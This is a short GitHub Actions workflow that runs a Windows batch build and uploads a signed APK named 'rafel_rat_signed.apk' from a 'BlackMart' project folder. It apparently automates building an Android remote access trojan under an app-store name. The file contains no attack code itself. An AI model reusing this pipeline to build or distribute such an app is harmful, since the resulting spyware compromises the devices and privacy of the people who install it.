name: Build
on: [pull_request, push]
jobs:
  build:
    runs-on: windows-2016
    steps:
    - uses: actions/checkout@v2
      
    - name: Build Release apk
      run: cmd /c build.bat

    - name: Upload APK
      uses: actions/upload-artifact@v2
      with:
          name: app
          path: "BlackMart/app/build/outputs/apk/release/rafel_rat_signed.apk"
